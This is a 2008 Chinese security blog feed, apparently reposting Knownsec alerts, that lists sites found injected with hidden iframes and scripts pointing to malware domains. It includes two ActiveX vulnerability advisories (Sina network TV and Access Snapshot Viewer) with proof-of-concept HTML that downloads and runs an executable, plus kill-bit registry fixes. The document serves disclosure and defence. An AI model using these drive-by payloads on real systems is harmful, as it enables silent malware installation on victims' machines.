知道创宇

网页分析：
/*信息来源：知道安全*/

网页分析：http://www.csdn.com/
title:技术导航

Suspicious_iframe(1): hXXp://k87kjujg.cn/zzhu.htm?757    Suspicious Level      : 3 

Popularity: 23% [?]

网页分析：

/*信息来源：知道安全*/

http://www.rmloho.com/user7/52984/archives/2008/376934.html
title:贾云老乡曝料：包养明星一大堆范冰冰/舒畅/小宋佳均有份　(组图)–娱乐咨询 - 乐活中国
suspicious_iframe(1): http://www.tl1-10.cn/a0153900/a15.htm?261        可疑级别  : 2 

Popularity: 23% [?]

https://www.dns-oarc.net/oarc/services/dnsentropy

Popularity: 24% [?]

发布日期：2008-7-18

最后更新日期：2008-7-18   15：57（GMT)

受影响系统：

详细: 

以下代码可能包含恶意行为,请勿轻易尝试,使用者风险自负.

<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1=”http://127.0.0.1/xxx.exe”;
install[”DownloadAndInstall”](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>

目前厂商已经发布新浪网络电视修复版本并且进行强制升级.请用户及时更新软件.

UC的用户请继续关注http://www.51uc.com/进行更新.

也可以为clsid：78ABDC59-D8E7-44D3-9A76-9A0918C52B4A设置kill bit.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A}]
“Compatibility Flags”=dword:00000400

安装365门神（WESEC）软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://www.scanw.com/

Popularity: 26% [?]

CN学习网(hXXp://www.szejux.cn)被插入恶意代码:

/*信息来源：知道安全*/

<iframe src=hXXp://www.nwerk.cn/115.htm?z1 width=0 height=0></iframe>

Popularity: 17% [?]

发布日期：2008-7-15

最后更新日期：2008-7-15   10：37（GMT）

关于电驴:是一款每月下载超过300万次，同时在线人数超过500万的P2P下载流行软件.详细: 

黑客入侵电驴后,在电驴首页连接的一个图片广告的页面代码里插入了恶意代码的连接,再通过多个漏洞攻击访问用户,导致用户不知情的情况下,下载并执行病毒.

目前官方尚未修复,请网友们暂时不要登陆电驴首页和打开电驴软件.或者

在你的电脑里将va9sdhun23.cn添加到HOSTS文件进行屏蔽。

安装365门神（WESEC）软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://www.scanw.com/

Popularity: 17% [?]

广州市美杰化妆品有限公司(hXXp://www.meize.com/News.asp)被插入恶意代码:
/*信息来源：知道安全*/

    [script]hXXp://qqhaomm.cn
    [script]hXXp://%63%63%68%61%6F%6D%6D%2E%63%6E

Popularity: 16% [?]

临汾一中校园网(hXXp://www.sxlfyz.cn/Article_Show.asp?ArticleID=923)被插入恶意代码:

/*信息来源：知道安全*/

    [frame]hXXp://viplg.qq.liyc.cn/index.html
    [script]hXXp://iihaomm.cn

Popularity: 16% [?]

发布日期：2008-7-10

最后更新日期：2008-7-10   15：57（GMT）

受影响系统：

Microsoft Access 2003
Microsoft Access 2002
Microsoft Access 2000
Microsoft Snapshot Viewer 10.0.4622

 详细: 

受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.

Microsoft Access中捆绑了快照工具Microsoft Snapshot Viewer,由于该工具的控件没有正确验证SnapshotPath,
CompressedPath的参数,导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到任意位置,并且随着系统启动而执行.

<html>
<object classid=’clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id=’obj’></object>
<script language=’javascript’>
var buf1 = ‘http://http://www.scanw.com/greysign/test.exe’;
var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe’;
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>

目前厂商尚未发布补丁程序.建议使用此软件的用户关注以下地址进行更新:

http://www.microsoft.com/technet/security/

将以下CLSID设置KILLBIT:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

安装365门神（WESEC）软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://www.scanw.com/

Popularity: 28% [?]

中国青年旅行(hXXp://www.cyta.com.cn)被插入恶意代码:

/*信息来源：知道安全*/
<script src=”hXXp://%76%63%63%64%2E%63%6E></script>
<script src=hXXp://qqhaomm.cn></script>

Popularity: 13% [?]